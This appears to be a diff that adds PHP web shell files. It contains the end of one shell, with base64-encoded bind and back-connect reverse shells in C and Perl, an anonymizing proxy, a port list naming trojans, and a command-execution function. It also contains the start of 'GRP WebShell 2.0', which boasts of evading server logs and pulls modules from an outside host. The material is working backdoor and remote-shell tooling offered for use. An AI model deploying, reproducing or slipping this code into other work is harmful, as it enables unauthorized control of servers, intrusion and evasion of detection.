+A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
+GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
+b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
+pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
+NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
+ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
+ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
+7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
+9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
+2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
+dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
+lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
+$port_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
+VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
+JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
+TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
+lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
+Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
+Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
+lIENPTk47DQpleGl0IDA7DQp9DQp9";
+$back_connect_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
+hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
+sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
+kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
+KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
+OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
+BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
+SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
+KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
+sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
+Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
+QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
+Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+$prx1="IyEvaG9tZS9tZXJseW4vYmluL3BlcmwgLXcNCiMjIw0KIyMjaHR0cDovL2ZvcnVtLndlYi1oYWNrLnJ1L2luZGV4LnBocD9zaG93dG9waWM9
+MjY3MDYmc3Q9MCYjZW50cnkyNDYzNDQNCiMjIw0KDQp1c2Ugc3RyaWN0Ow0KJEVOVntQQVRIfSA9IGpvaW4gXCI6XCIsIHF3KC91c3IvdWNiIC9iaW4
+gL3Vzci9iaW4pOw0KJHwrKzsNCg0KIyMgQ29weXJpZ2h0IChjKSAxOTk2IGJ5IFJhbmRhbCBMLiBTY2h3YXJ0eg0KIyMgVGhpcyBwcm9ncmFtIGlzIG
+ZyZWUgc29mdHdhcmU7IHlvdSBjYW4gcmVkaXN0cmlidXRlIGl0DQojIyBhbmQvb3IgbW9kaWZ5IGl0IHVuZGVyIHRoZSBzYW1lIHRlcm1zIGFzIFBlc
+mwgaXRzZWxmLg0KDQojIyBBbm9ueW1vdXMgSFRUUCBwcm94eSAoaGFuZGxlcyBodHRwOiwgZ29waGVyOiwgZnRwOikNCiMjIHJlcXVpcmVzIExXUCA1
+LjA0IG9yIGxhdGVyDQoNCm15ICRIT1NUID0gXCJsb2NhbGhvc3RcIjsNCm15ICRQT1JUID0gXCI=";
+$prx2="XCI7DQoNCnN1YiBwcmVmaXggew0KIG15ICRub3cgPSBsb2NhbHRpbWU7DQoNCiBqb2luIFwiXCIsIG1hcCB7IFwiWyRub3ddIFskeyR9XSAk
+X1xcblwiIH0gc3BsaXQgL1xcbi8sIGpvaW4gXCJcIiwgQF87DQp9DQoNCiRTSUd7X19XQVJOX199ID0gc3ViIHsgd2FybiBwcmVmaXggQF8gfTsNCiR
+TSUd7X19ESUVfX30gPSBzdWIgeyBkaWUgcHJlZml4IEBfIH07DQokU0lHe0NMRH0gPSAkU0lHe0NITER9ID0gc3ViIHsgd2FpdDsgfTsNCg0KbXkgJE
+FHRU5UOyAgICMgZ2xvYmFsIHVzZXIgYWdlbnQgKGZvciBlZmZpY2llbmN5KQ0KQkVHSU4gew0KIHVzZSBMV1A6OlVzZXJBZ2VudDsNCg0KIEBNeUFnZ
+W50OjpJU0EgPSBxdyhMV1A6OlVzZXJBZ2VudCk7ICMgc2V0IGluaGVyaXRhbmNlDQoNCiAkQUdFTlQgPSBNeUFnZW50LT5uZXc7DQogJEFHRU5ULT5h
+Z2VudChcImFub24vMC4wN1wiKTsNCiAkQUdFTlQtPmVudl9wcm94eTsNCn0NCg0Kc3ViIE15QWdlbnQ6OnJlZGlyZWN0X29rIHsgMCB9ICMgcmVkaXJ
+lY3RzIHNob3VsZCBwYXNzIHRocm91Z2gNCg0KeyAgICAjIyMgTUFJTiAjIyMNCiB1c2UgSFRUUDo6RGFlbW9uOw0KDQogbXkgJG1hc3RlciA9IG5ldy
+BIVFRQOjpEYWVtb24NCiAgIExvY2FsQWRkciA9PiAkSE9TVCwgTG9jYWxQb3J0ID0+ICRQT1JUOw0KIHdhcm4gXCJzZXQgeW91ciBwcm94eSB0byA8V
+VJMOlwiLCAkbWFzdGVyLT51cmwsIFwiPlwiOw0KIG15ICRzbGF2ZTsNCiAmaGFuZGxlX2Nvbm5lY3Rpb24oJHNsYXZlKSB3aGlsZSAkc2xhdmUgPSAk
+bWFzdGVyLT5hY2NlcHQ7DQogZXhpdCAwOw0KfSAgICAjIyMgRU5EIE1BSU4gIyMjDQoNCnN1YiBoYW5kbGVfY29ubmVjdGlvbiB7DQogbXkgJGNvbm5
+lY3Rpb24gPSBzaGlmdDsgIyBIVFRQOjpEYWVtb246OkNsaWVudENvbm4NCg0KIG15ICRwaWQgPSBmb3JrOw0KIGlmICgkcGlkKSB7ICAgIyBzcGF3bi
+BPSywgYW5kIElcJ20gdGhlIHBhcmVudA0KICAgY2xvc2UgJGNvbm5lY3Rpb247DQogICByZXR1cm47DQogfQ0KICMjIHNwYXduIGZhaWxlZCwgb3IgS
+VwnbSBhIGdvb2QgY2hpbGQNCiBteSAkcmVxdWVzdCA9ICRjb25uZWN0aW9uLT5nZXRfcmVxdWVzdDsNCiBpZiAoZGVmaW5lZCgkcmVxdWVzdCkpIHsN
+CiAgIG15ICRyZXNwb25zZSA9ICZmZXRjaF9yZXF1ZXN0KCRyZXF1ZXN0KTsNCiAgICRjb25uZWN0aW9uLT5zZW5kX3Jlc3BvbnNlKCRyZXNwb25zZSk
+7DQogICBjbG9zZSAkY29ubmVjdGlvbjsNCiB9DQogZXhpdCAwIGlmIGRlZmluZWQgJHBpZDsgIyBleGl0IGlmIElcJ20gYSBnb29kIGNoaWxkIHdpdG
+ggYSBnb29kIHBhcmVudA0KfQ0KDQpzdWIgZmV0Y2hfcmVxdWVzdCB7DQogbXkgJHJlcXVlc3QgPSBzaGlmdDsgICMgSFRUUDo6UmVxdWVzdA0KDQogd
+XNlIEhUVFA6OlJlc3BvbnNlOw0KDQogbXkgJHVybCA9ICRyZXF1ZXN0LT51cmw7DQogd2FybiBcImZldGNoaW5nICR1cmxcIjsNCiBpZiAoJHVybC0+
+c2NoZW1lICF+IC9eKGh0dHB8Z29waGVyfGZ0cCkkLykgew0KICAgbXkgJHJlcyA9IEhUVFA6OlJlc3BvbnNlLT5uZXcoNDAzLCBcIkZvcmJpZGRlblw
+iKTsNCiAgICRyZXMtPmNvbnRlbnQoXCJiYWQgc2NoZW1lOiBAe1skdXJsLT5zY2hlbWVdfVxcblwiKTsNCiAgICRyZXM7DQogfSBlbHNpZiAobm90IC
+R1cmwtPnJlbC0+bmV0bG9jKSB7DQogICBteSAkcmVzID0gSFRUUDo6UmVzcG9uc2UtPm5ldyg0MDMsIFwiRm9yYmlkZGVuXCIpOw0KICAgJHJlcy0+Y
+29udGVudChcInJlbGF0aXZlIFVSTCBub3QgcGVybWl0dGVkXFxuXCIpOw0KICAgJHJlczsNCiB9IGVsc2Ugew0KICAgJmZldGNoX3ZhbGlkYXRlZF9y
+ZXF1ZXN0KCRyZXF1ZXN0KTsNCiB9DQp9DQoNCnN1YiBmZXRjaF92YWxpZGF0ZWRfcmVxdWVzdCB7DQogbXkgJHJlcXVlc3QgPSBzaGlmdDsgIyBIVFR
+QOjpSZXF1ZXN0DQoNCiAjIyB1c2VzIGdsb2JhbCAkQUdFTlQNCg0KICMjIHdhcm4gXCJvcmlnIHJlcXVlc3Q6IDw8PFwiLCAkcmVxdWVzdC0+aGVhZG
+Vyc19hc19zdHJpbmcsIFwiPj4+XCI7DQogJHJlcXVlc3QtPnJlbW92ZV9oZWFkZXIocXcoVXNlci1BZ2VudCBGcm9tIFJlZmVyZXIgQ29va2llKSk7D
+QogIyMgd2FybiBcImFub24gcmVxdWVzdDogPDw8XCIsICRyZXF1ZXN0LT5oZWFkZXJzX2FzX3N0cmluZywgXCI+Pj5cIjsNCiBteSAkcmVzcG9uc2Ug
+PSAkQUdFTlQtPnJlcXVlc3QoJHJlcXVlc3QpOw0KICMjIHdhcm4gXCJvcmlnIHJlc3BvbnNlOiA8PDxcIiwgJHJlc3BvbnNlLT5oZWFkZXJzX2FzX3N
+0cmluZywgXCI+Pj5cIjsNCiAkcmVzcG9uc2UtPnJlbW92ZV9oZWFkZXIocXcoU2V0LUNvb2tpZSkpOw0KICMjIHdhcm4gXCJhbm9uIHJlc3BvbnNlOi
+A8PDxcIiwgJHJlc3BvbnNlLT5oZWFkZXJzX2FzX3N0cmluZywgXCI+Pj5cIjsNCiAkcmVzcG9uc2U7DQp9";
+$port[1] = "tcpmux (TCP Port Service Multiplexer)";
+$port[2] = "Management Utility";
+$port[3] = "Compression Process";
+$port[5] = "rje (Remote Job Entry)";
+$port[7] = "echo";
+$port[9] = "discard";
+$port[11] = "systat";
+$port[13] = "daytime";
+$port[15] = "netstat";
+$port[17] = "quote of the day";
+$port[18] = "send/rwp";
+$port[19] = "character generator";
+$port[20] = "ftp-data";
+$port[21] = "ftp";
+$port[22] = "ssh, pcAnywhere";
+$port[23] = "Telnet";
+$port[25] = "SMTP (Simple Mail Transfer)";
+$port[27] = "ETRN (NSW User System FE)";
+$port[29] = "MSG ICP";
+$port[31] = "MSG Authentication";
+$port[33] = "dsp (Display Support Protocol)";
+$port[37] = "time";
+$port[38] = "RAP (Route Access Protocol)";
+$port[39] = "rlp (Resource Location Protocol)";
+$port[41] = "Graphics";
+$port[42] = "nameserv, WINS";
+$port[43] = "whois, nickname";
+$port[44] = "MPM FLAGS Protocol";
+$port[45] = "Message Processing Module [recv]";
+$port[46] = "MPM [default send]";
+$port[47] = "NI FTP";
+$port[48] = "Digital Audit Daemon";
+$port[49] = "TACACS, Login Host Protocol";
+$port[50] = "RMCP, re-mail-ck";
+$port[53] = "DNS";
+$port[57] = "MTP (any private terminal access)";
+$port[59] = "NFILE";
+$port[60] = "Unassigned";
+$port[61] = "NI MAIL";
+$port[62] = "ACA Services";
+$port[63] = "whois++";
+$port[64] = "Communications Integrator (CI)";
+$port[65] = "TACACS-Database Service";
+$port[66] = "Oracle SQL*NET";
+$port[67] = "bootps (Bootstrap Protocol Server)";
+$port[68] = "bootpd/dhcp (Bootstrap Protocol Client)";
+$port[69] = "Trivial File Transfer Protocol (tftp)";
+$port[70] = "Gopher";
+$port[71] = "Remote Job Service";
+$port[72] = "Remote Job Service";
+$port[73] = "Remote Job Service";
+$port[74] = "Remote Job Service";
+$port[75] = "any private dial out service";
+$port[76] = "Distributed External Object Store";
+$port[77] = "any private RJE service";
+$port[78] = "vettcp";
+$port[79] = "finger";
+$port[80] = "World Wide Web HTTP";
+$port[81] = "HOSTS2 Name Serve";
+$port[82] = "XFER Utility";
+$port[83] = "MIT ML Device";
+$port[84] = "Common Trace Facility";
+$port[85] = "MIT ML Device";
+$port[86] = "Micro Focus Cobol";
+$port[87] = "any private terminal link";
+$port[88] = "Kerberos, WWW";
+$port[89] = "SU/MIT Telnet Gateway";
+$port[90] = "DNSIX Securit Attribute Token Map";
+$port[91] = "MIT Dover Spooler";
+$port[92] = "Network Printing Protocol";
+$port[93] = "Device Control Protocol";
+$port[94] = "Tivoli Object Dispatcher";
+$port[95] = "supdup";
+$port[96] = "DIXIE";
+$port[98] = "linuxconf";
+$port[99] = "Metagram Relay";
+$port[100] = "[unauthorized use]";
+$port[101] = "HOSTNAME";
+$port[102] = "ISO, X.400, ITOT";
+$port[103] = "Genesis Point-to-Point";
+$port[104] = "ACR-NEMA Digital Imag. & Comm. 300";
+$port[105] = "CCSO name server protocol";
+$port[106] = "poppassd";
+$port[107] = "Remote Telnet Service";
+$port[108] = "SNA Gateway Access Server";
+$port[109] = "POP2";
+$port[110] = "POP3";
+$port[111] = "Sun RPC Portmapper";
+$port[112] = "McIDAS Data Transmission Protocol";
+$port[113] = "Authentication Service";
+$port[115] = "sftp (Simple File Transfer Protocol)";
+$port[116] = "ANSA REX Notify";
+$port[117] = "UUCP Path Service";
+$port[118] = "SQL Services";
+$port[119] = "NNTP";
+$port[120] = "CFDP";
+$port[123] = "NTP";
+$port[124] = "SecureID";
+$port[129] = "PWDGEN";
+$port[133] = "statsrv";
+$port[135] = "loc-srv/epmap";
+$port[137] = "netbios-ns";
+$port[138] = "netbios-dgm (UDP)";
+$port[139] = "NetBIOS";
+$port[143] = "IMAP";
+$port[144] = "NewS";
+$port[150] = "SQL-NET";
+$port[152] = "BFTP";
+$port[153] = "SGMP";
+$port[156] = "SQL Service";
+$port[161] = "SNMP";
+$port[175] = "vmnet";
+$port[177] = "XDMCP";
+$port[178] = "NextStep Window Server";
+$port[179] = "BGP";
+$port[180] = "SLmail admin";
+$port[199] = "smux";
+$port[210] = "Z39.50";
+$port[213] = "IPX";
+$port[218] = "MPP";
+$port[220] = "IMAP3";
+$port[256] = "RAP";
+$port[257] = "Secure Electronic Transaction";
+$port[258] = "Yak Winsock Personal Chat";
+$port[259] = "ESRO";
+$port[264] = "FW1_topo";
+$port[311] = "Apple WebAdmin";
+$port[350] = "MATIP type A";
+$port[351] = "MATIP type B";
+$port[363] = "RSVP tunnel";
+$port[366] = "ODMR (On-Demand Mail Relay)";
+$port[371] = "Clearcase";
+$port[387] = "AURP (AppleTalk Update-Based Routing Protocol)";
+$port[389] = "LDAP";
+$port[407] = "Timbuktu";
+$port[427] = "Server Location";
+$port[434] = "Mobile IP";
+$port[443] = "ssl";
+$port[444] = "snpp, Simple Network Paging Protocol";
+$port[445] = "SMB";
+$port[458] = "QuickTime TV/Conferencing";
+$port[468] = "Photuris";
+$port[475] = "tcpnethaspsrv";
+$port[500] = "ISAKMP, pluto";
+$port[511] = "mynet-as";
+$port[512] = "biff, rexec";
+$port[513] = "who, rlogin";
+$port[514] = "syslog, rsh";
+$port[515] = "lp, lpr, line printer";
+$port[517] = "talk";
+$port[520] = "RIP (Routing Information Protocol)";
+$port[521] = "RIPng";
+$port[522] = "ULS";
+$port[531] = "IRC";
+$port[543] = "KLogin, AppleShare over IP";
+$port[545] = "QuickTime";
+$port[548] = "AFP";
+$port[554] = "Real Time Streaming Protocol";
+$port[555] = "phAse Zero";
+$port[563] = "NNTP over SSL";
+$port[575] = "VEMMI";
+$port[581] = "Bundle Discovery Protocol";
+$port[593] = "MS-RPC";
+$port[608] = "SIFT/UFT";
+$port[626] = "Apple ASIA";
+$port[631] = "IPP (Internet Printing Protocol)";
+$port[635] = "RLZ DBase";
+$port[636] = "sldap";
+$port[642] = "EMSD";
+$port[648] = "RRP (NSI Registry Registrar Protocol)";
+$port[655] = "tinc";
+$port[660] = "Apple MacOS Server Admin";
+$port[666] = "Doom";
+$port[674] = "ACAP";
+$port[687] = "AppleShare IP Registry";
+$port[700] = "buddyphone";
+$port[705] = "AgentX for SNMP";
+$port[901] = "swat, realsecure";
+$port[993] = "s-imap";
+$port[995] = "s-pop";
+$port[1024] = "Reserved";
+$port[1025] = "network blackjack";
+$port[1062] = "Veracity";
+$port[1080] = "SOCKS";
+$port[1085] = "WebObjects";
+$port[1227] = "DNS2Go";
+$port[1243] = "SubSeven";
+$port[1338] = "Millennium Worm";
+$port[1352] = "Lotus Notes";
+$port[1381] = "Apple Network License Manager";
+$port[1417] = "Timbuktu Service 1 Port";
+$port[1418] = "Timbuktu Service 2 Port";
+$port[1419] = "Timbuktu Service 3 Port";
+$port[1420] = "Timbuktu Service 4 Port";
+$port[1433] = "Microsoft SQL Server";
+$port[1434] = "Microsoft SQL Monitor";
+$port[1477] = "ms-sna-server";
+$port[1478] = "ms-sna-base";
+$port[1490] = "insitu-conf";
+$port[1494] = "Citrix ICA Protocol";
+$port[1498] = "Watcom-SQL";
+$port[1500] = "VLSI License Manager";
+$port[1503] = "T.120";
+$port[1521] = "Oracle SQL";
+$port[1522] = "Ricardo North America License Manager";
+$port[1524] = "ingres";
+$port[1525] = "prospero";
+$port[1526] = "prospero";
+$port[1527] = "tlisrv";
+$port[1529] = "oracle";
+$port[1547] = "laplink";
+$port[1604] = "Citrix ICA, MS Terminal Server";
+$port[1645] = "RADIUS Authentication";
+$port[1646] = "RADIUS Accounting";
+$port[1680] = "Carbon Copy";
+$port[1701] = "L2TP/LSF";
+$port[1717] = "Convoy";
+$port[1720] = "H.323/Q.931";
+$port[1723] = "PPTP control port";
+$port[1731] = "MSICCP";
+$port[1755] = "Windows Media .asf";
+$port[1758] = "TFTP multicast";
+$port[1761] = "cft-0";
+$port[1762] = "cft-1";
+$port[1763] = "cft-2";
+$port[1764] = "cft-3";
+$port[1765] = "cft-4";
+$port[1766] = "cft-5";
+$port[1767] = "cft-6";
+$port[1808] = "Oracle-VP2";
+$port[1812] = "RADIUS server";
+$port[1813] = "RADIUS accounting";
+$port[1818] = "ETFTP";
+$port[1973] = "DLSw DCAP/DRAP";
+$port[1985] = "HSRP";
+$port[1999] = "Cisco AUTH";
+$port[2001] = "glimpse";
+$port[2049] = "NFS";
+$port[2064] = "distributed.net";
+$port[2065] = "DLSw";
+$port[2066] = "DLSw";
+$port[2106] = "MZAP";
+$port[2140] = "DeepThroat";
+$port[2301] = "Compaq Insight Management Web Agents";
+$port[2327] = "Netscape Conference";
+$port[2336] = "Apple UG Control";
+$port[2427] = "MGCP gateway";
+$port[2504] = "WLBS";
+$port[2535] = "MADCAP";
+$port[2543] = "sip";
+$port[2592] = "netrek";
+$port[2727] = "MGCP call agent";
+$port[2628] = "DICT";
+$port[2998] = "ISS Real Secure Console Service Port";
+$port[3000] = "Firstclass";
+$port[3001] = "Redwood Broker";
+$port[3031] = "Apple AgentVU";
+$port[3128] = "squid";
+$port[3130] = "ICP";
+$port[3150] = "DeepThroat";
+$port[3264] = "ccmail";
+$port[3283] = "Apple NetAssitant";
+$port[3288] = "COPS";
+$port[3305] = "ODETTE";
+$port[3306] = "mySQL";
+$port[3389] = "RDP Protocol (Terminal Server)";
+$port[3521] = "netrek";
+$port[4000] = "icq, command-n-conquer and shell nfm";
+$port[4321] = "rwhois";
+$port[4333] = "mSQL";
+$port[4444] = "KRB524";
+$port[4827] = "HTCP";
+$port[5002] = "radio free ethernet";
+$port[5004] = "RTP";
+$port[5005] = "RTP";
+$port[5010] = "Yahoo! Messenger";
+$port[5050] = "multimedia conference control tool";
+$port[5060] = "SIP";
+$port[5150] = "Ascend Tunnel Management Protocol";
+$port[5190] = "AIM";
+$port[5500] = "securid";
+$port[5501] = "securidprop";
+$port[5423] = "Apple VirtualUser";
+$port[5555] = "Personal Agent";
+$port[5631] = "PCAnywhere data";
+$port[5632] = "PCAnywhere";
+$port[5678] = "Remote Replication Agent Connection";
+$port[5800] = "VNC";
+$port[5801] = "VNC";
+$port[5900] = "VNC";
+$port[5901] = "VNC";
+$port[6000] = "X Windows";
+$port[6112] = "BattleNet";
+$port[6502] = "Netscape Conference";
+$port[6667] = "IRC";
+$port[6670] = "VocalTec Internet Phone, DeepThroat";
+$port[6699] = "napster";
+$port[6776] = "Sub7";
+$port[6970] = "RTP";
+$port[7007] = "MSBD, Windows Media encoder";
+$port[7070] = "RealServer/QuickTime";
+$port[7777] = "cbt";
+$port[7778] = "Unreal";
+$port[7648] = "CU-SeeMe";
+$port[7649] = "CU-SeeMe";
+$port[8000] = "iRDMI/Shoutcast Server";
+$port[8010] = "WinGate 2.1";
+$port[8080] = "HTTP";
+$port[8181] = "HTTP";
+$port[8383] = "IMail WWW";
+$port[8875] = "napster";
+$port[8888] = "napster";
+$port[8889] = "Desktop Data TCP 1";
+$port[8890] = "Desktop Data TCP 2";
+$port[8891] = "Desktop Data TCP 3: NESS application";
+$port[8892] = "Desktop Data TCP 4: FARM product";
+$port[8893] = "Desktop Data TCP 5: NewsEDGE/Web application";
+$port[8894] = "Desktop Data TCP 6: COAL application";
+$port[9000] = "CSlistener";
+$port[10008] = "cheese worm";
+$port[11371] = "PGP 5 Keyserver";
+$port[13223] = "PowWow";
+$port[13224] = "PowWow";
+$port[14237] = "Palm";
+$port[14238] = "Palm";
+$port[18888] = "LiquidAudio";
+$port[21157] = "Activision";
+$port[22555] = "Vocaltec Web Conference";
+$port[23213] = "PowWow";
+$port[23214] = "PowWow";
+$port[23456] = "EvilFTP";
+$port[26000] = "Quake";
+$port[27001] = "QuakeWorld";
+$port[27010] = "Half-Life";
+$port[27015] = "Half-Life";
+$port[27960] = "QuakeIII";
+$port[30029] = "AOL Admin";
+$port[31337] = "Back Orifice";
+$port[32777] = "rpc.walld";
+$port[45000] = "Cisco NetRanger postofficed";
+$port[32773] = "rpc bserverd";
+$port[32776] = "rpc.spray";
+$port[32779] = "rpc.cmsd";
+$port[38036] = "timestep";
+$port[40193] = "Novell";
+$port[41524] = "arcserve discovery";
+////////////////////////////////////////////////////////////////////////////////
+////////////////////////////////ÔÓÍÊÖÈÈ/////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////////
+function rep_char($ch,$count)                  //Ïîâòîðåíèå ñèìâîëà
+{
+ $res="";
+ for($i=0; $i<=$count; ++$i){
+  $res.=$ch."";
+ }
+ return $res;
+}
+function ex($comd)                             //Âûïîëíåíèå êîìàíäû
+{
+ $res = '';
+ if (!empty($comd)){
+  if(function_exists('exec')){
+    exec($comd,$res);
+    $res=implode("\n",$res);
+   }elseif(function_exists('shell_exec')){
+    $res=shell_exec($comd);
+   }elseif(function_exists('system')){
+    ob_start();
+    system($comd);
+    $res=ob_get_contents();
+    ob_end_clean();
+   }elseif(function_exists('passthru')){
+    ob_start();
+    passthru($comd);
+    $res=ob
+

php/GRP WebShell 2.0 release build 2018 (C)2006,Great.php

@@ -0,0 +1,575 @@
+<?php
+
+/*
+ * GReat's Post (GRP) web shell
+ * Shell uses POST queries to send data to the server, so logs on the webserver are absolutely clear ;)
+ *
+ * Coded by Great (C) 2006.
+ * All rights reserved
+ */
+
+// Config
+
+// Enable BASIC authorization
+$auth = 0;
+// You really don't need to turn it on
+$devel = 0;
+// Allow images?
+$images = 0;
+// If $images=1, set this variable equal to the base URL for the images folder.png & file.png
+$images_url = "http://localhost/";
+// Show errors?
+$errors = 1;
+// Modules path
+$modules_base = "http://cribble.by.ru/grp_mod/";
+// Modules supported
+$modules = array("browse" => "File browser", "mysql" => "MySQL");
+// Script version
+$script_release = "GRP WebShell 2.0 release build 2018 (C)2006,Great";
+
+// Authorization
+
+$name='63191e4ece37523c9fe6bb62a5e64d45';
+$pass='47ce56ef73da9dec757ef654e6aa1ca1';
+$caption="Enter your login and password";
+if ($auth &&  (!isset($HTTP_SERVER_VARS['PHP_AUTH_USER']) || md5($HTTP_SERVER_VARS['PHP_AUTH_USER'])!=$name || md5($HTTP_SERVER_VARS['PHP_AUTH_PW'])!=$pass))
+{
+	header("WWW-Authenticate: Basic realm=\"$caption\"");
+	header("HTTP/1.0 401 Unauthorized");
+	exit("<h1>Unauthorized access</h1>");
+}
+
+if($errors)
+  error_reporting(E_ALL&~E_NOTICE);
+else
+  error_reporting(0);
+
+// Strip slashes
+
+if(get_magic_quotes_gpc())
+{
+ foreach(array("_POST", "_GET", "_FILES", "_COOKIE") as $ar)
+  foreach($GLOBALS[$ar] as $k=>$v)
+    $GLOBALS[$ar][$k] = stripslashes($v);
+}
+
+// Useful functions
+
+// Print post form
+function post_form($name, $params, $a="", $b="")
+{
+  static $i=0;
+  echo "<form method='post' name='PostActForm$i'>\n";
+  foreach($params as $n=>$v)
+    echo "<input type='hidden' name='$n' value='$v'>\n";
+  echo "$a<a href='javascript:void(0);' onClick='document.PostActForm$i.submit()'>$name</a>$b</form>\n";
+  $i++;
+}
+
+// Print post form without confirmation link
+function post_empty_form($params)
+{
